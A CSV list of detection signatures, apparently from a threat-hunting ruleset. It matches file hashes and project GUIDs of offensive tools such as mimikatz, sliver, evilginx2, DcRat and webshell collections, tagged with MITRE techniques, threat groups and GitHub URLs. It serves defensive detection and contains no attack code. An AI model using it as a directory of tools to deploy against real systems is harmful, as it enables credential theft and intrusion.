"*6A3F2F04-3E48-4E21-9AB8-0CA0998A2D01*",".{0,1000}6A3F2F04\-3E48\-4E21\-9AB8\-0CA0998A2D01.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","28353"
"*6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d*",".{0,1000}6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28355"
"*6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d*",".{0,1000}6a4345d4d5465097dfbe8ba3d2007c7200c8cf320f9123abc1bf03f12dbe6b4d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","28356"
"*6a4774242342d05732cabe098a56b1948d90f97fe72f464e347315b6d0e0becc*",".{0,1000}6a4774242342d05732cabe098a56b1948d90f97fe72f464e347315b6d0e0becc.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28358"
"*6a48338880ea3ada4e5675edda95cfa57976ee18b6de9fbf6ab5ce545ee42ea8*",".{0,1000}6a48338880ea3ada4e5675edda95cfa57976ee18b6de9fbf6ab5ce545ee42ea8.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","28359"
"*6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c*",".{0,1000}6a484c1db7718949c7027abde97e164c7e7e4e4214e3e29fe48ac4364c0cd23c.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","#filehash","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","28360"
"*6a4fbed745f3af1684f1636445f56bf65f02db3926d0e4f8eef2661eaff9df9a*",".{0,1000}6a4fbed745f3af1684f1636445f56bf65f02db3926d0e4f8eef2661eaff9df9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28361"
"*6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa*",".{0,1000}6a5607a6886ad393bd1926b90a6364fb8b6546ad6963f42571c609279b446faa.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28362"
"*6A5942A4-9086-408E-A9B4-05ABC34BFD58*",".{0,1000}6A5942A4\-9086\-408E\-A9B4\-05ABC34BFD58.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","#GUIDproject","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","28363"
"*6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751*",".{0,1000}6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","28364"
"*6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751*",".{0,1000}6a5edddee3c2cd833864b0cae1a3a8e64bf48fef7bd421d7a779340bf55f8751.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","28365"
"*6a7a023923c747c9a2b6c1664da1b04a45c0b978141d189794110ae3768f231f*",".{0,1000}6a7a023923c747c9a2b6c1664da1b04a45c0b978141d189794110ae3768f231f.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28369"
"*6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73*",".{0,1000}6a8351ce89e27856e20f04a2500f9a7851ea05113fb6babb4f359aa7a389ca73.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28370"
"*6a88063e6945b8812f30c17209dc3eb3f3449d4ac0e5f80f0dbbee8d74889c0f*",".{0,1000}6a88063e6945b8812f30c17209dc3eb3f3449d4ac0e5f80f0dbbee8d74889c0f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28372"
"*6a8d314ea62f3a61c0936755e82d928ce07e13a297b6ef02ad8821c235da8149*",".{0,1000}6a8d314ea62f3a61c0936755e82d928ce07e13a297b6ef02ad8821c235da8149.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28373"
"*6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368*",".{0,1000}6a956fdb1b7c65755156898c2f4065a555eb80393a25dc8b1a118f87e67d8368.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28374"
"*6a9a3b838e5547654d9b0d9024e2afcaa0ad721de33499d192684cda337d49f5*",".{0,1000}6a9a3b838e5547654d9b0d9024e2afcaa0ad721de33499d192684cda337d49f5.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28376"
"*6aa3276e8a8fafb17e99321fad558a22f628c82b1143227ffad08382dcb679ea*",".{0,1000}6aa3276e8a8fafb17e99321fad558a22f628c82b1143227ffad08382dcb679ea.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#filehash","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","28377"
"*6aa39b4578eae70ad9e80df833b4633a5e78eda7b75b071d14f0a3befdf81223*",".{0,1000}6aa39b4578eae70ad9e80df833b4633a5e78eda7b75b071d14f0a3befdf81223.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","28378"
"*6AA4E392-AAAF-4408-B550-85863DD4BAAF*",".{0,1000}6AA4E392\-AAAF\-4408\-B550\-85863DD4BAAF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28379"
"*6AA4E392-AAAF-4408-B550-85863DF3BAAF*",".{0,1000}6AA4E392\-AAAF\-4408\-B550\-85863DF3BAAF.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","28380"
"*6aa6e18ab15cb987dc3b2e46ed239f7ce5af2df55ace0f7878eddac6f5bee59e*",".{0,1000}6aa6e18ab15cb987dc3b2e46ed239f7ce5af2df55ace0f7878eddac6f5bee59e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28381"
"*6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b*",".{0,1000}6ab1c97d28cd80efc5b8698646098879e52c927b7096989b505380e5e6f3b24b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28382"
"*6ab35eafc987bec331424733bd59804b320ce0801bcb96aa6fa854a23233d9a2*",".{0,1000}6ab35eafc987bec331424733bd59804b320ce0801bcb96aa6fa854a23233d9a2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28384"
"*6ab49d8b-a009-44e4-bd53-fbdb48fbe7eb*",".{0,1000}6ab49d8b\-a009\-44e4\-bd53\-fbdb48fbe7eb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#content","test password","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28385"
"*6ac46beb56b053bac9e406bc16131669c93c8f578a3cdc467821ed07c03e596a*",".{0,1000}6ac46beb56b053bac9e406bc16131669c93c8f578a3cdc467821ed07c03e596a.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28389"
"*6ac4ea67fb65559c2e36fb651cdd4ebcf4817f1e8109db5b0df0a010cb3b95e0*",".{0,1000}6ac4ea67fb65559c2e36fb651cdd4ebcf4817f1e8109db5b0df0a010cb3b95e0.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28390"
"*6ac7c6229db63b7fe25b570e1b084ec373169f57479d8a3ff7ebeaaac440fafe*",".{0,1000}6ac7c6229db63b7fe25b570e1b084ec373169f57479d8a3ff7ebeaaac440fafe.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28391"
"*6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8*",".{0,1000}6ac9d19e7e7f05803c114b0a76b881f3536d1cc85198f1129d75a91c5efa6aa8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28392"
"*6ae1f12ee3a93a2eb5375d65509afd69c5b34bda454d44c585793f112714d4e1*",".{0,1000}6ae1f12ee3a93a2eb5375d65509afd69c5b34bda454d44c585793f112714d4e1.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28394"
"*6ae454a1437a68e791160c093bb80d0acc962d8116ae672421e40fc418cdc4fd*",".{0,1000}6ae454a1437a68e791160c093bb80d0acc962d8116ae672421e40fc418cdc4fd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28395"
"*6b0a9af5eea28129fff4c32a284672000e7ac7d968469d23c5aa341eb1eea262*",".{0,1000}6b0a9af5eea28129fff4c32a284672000e7ac7d968469d23c5aa341eb1eea262.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28396"
"*6b1017d1325f9f981edbaf071defdda45e26af30eb2a6819c039a6a17e8a14c7*",".{0,1000}6b1017d1325f9f981edbaf071defdda45e26af30eb2a6819c039a6a17e8a14c7.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28397"
"*6b1999feac59cbb6e99129a25ffadff086bd232d7bcf05d4e6e004ce2901a3eb*",".{0,1000}6b1999feac59cbb6e99129a25ffadff086bd232d7bcf05d4e6e004ce2901a3eb.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","28398"
"*6b2324bb337f722067e6c1b5cef5f64e89338e2beccf95289aaaa2af8a0556b9*",".{0,1000}6b2324bb337f722067e6c1b5cef5f64e89338e2beccf95289aaaa2af8a0556b9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28399"
"*6b2f186837bba117f38583e6f176c56cb59e0d1bff76f5b8ad538977f00b49d1*",".{0,1000}6b2f186837bba117f38583e6f176c56cb59e0d1bff76f5b8ad538977f00b49d1.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28402"
"*6b30df4eb8183003bea2c86c7c52b5e555a56b3f127715a0ebf0afb22b719972*",".{0,1000}6b30df4eb8183003bea2c86c7c52b5e555a56b3f127715a0ebf0afb22b719972.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28404"
"*6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4*",".{0,1000}6b34ffba8e7ce5f0e5e7c157d7e65d320850c98de350d332421e8373aa9fa3a4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28405"
"*6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283*",".{0,1000}6b3d229a02f91fbac23a4385a1b8ca8fe851c9c99c94341dfc5fda41cecc1283.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28407"
"*6b45295ad89a7ecb49f612579ee05ea4b8617ac14f7026f15dc3395244b44c99*",".{0,1000}6b45295ad89a7ecb49f612579ee05ea4b8617ac14f7026f15dc3395244b44c99.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","28408"
"*6b494408f85854b48cba397472c9da57a5757305bb7759c1b2abbff9dcf9f649*",".{0,1000}6b494408f85854b48cba397472c9da57a5757305bb7759c1b2abbff9dcf9f649.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28409"
"*6b49ab14afa0c2764f31c768dcc45b7efee3967d3cd4f572c4bb99cc4e128c38*",".{0,1000}6b49ab14afa0c2764f31c768dcc45b7efee3967d3cd4f572c4bb99cc4e128c38.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","28410"
"*6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113*",".{0,1000}6b4a7999ab5fa112e69ea99a01bcf41a23c8a01780f96eb1647fa98b80694113.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28411"
"*6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347*",".{0,1000}6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28412"
"*6b5477e05628d2f5c4bb2a03556dc46642e986e78d98cb4a95fa5cd49457a171*",".{0,1000}6b5477e05628d2f5c4bb2a03556dc46642e986e78d98cb4a95fa5cd49457a171.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28413"
"*6b5675be7aa2c43191262f462d98730f2672d54869577e44bcbb18984544ac11*",".{0,1000}6b5675be7aa2c43191262f462d98730f2672d54869577e44bcbb18984544ac11.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28414"
"*6b6951ec4a702ae5c22c9d7589621cef36e055fda1f5eb5cc9709dfb5d514148*",".{0,1000}6b6951ec4a702ae5c22c9d7589621cef36e055fda1f5eb5cc9709dfb5d514148.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28416"
"*6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5*",".{0,1000}6b6ae7b2bf3914eead08418884e8ad8121d7f5649424cf57888a884f1461f9a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28417"
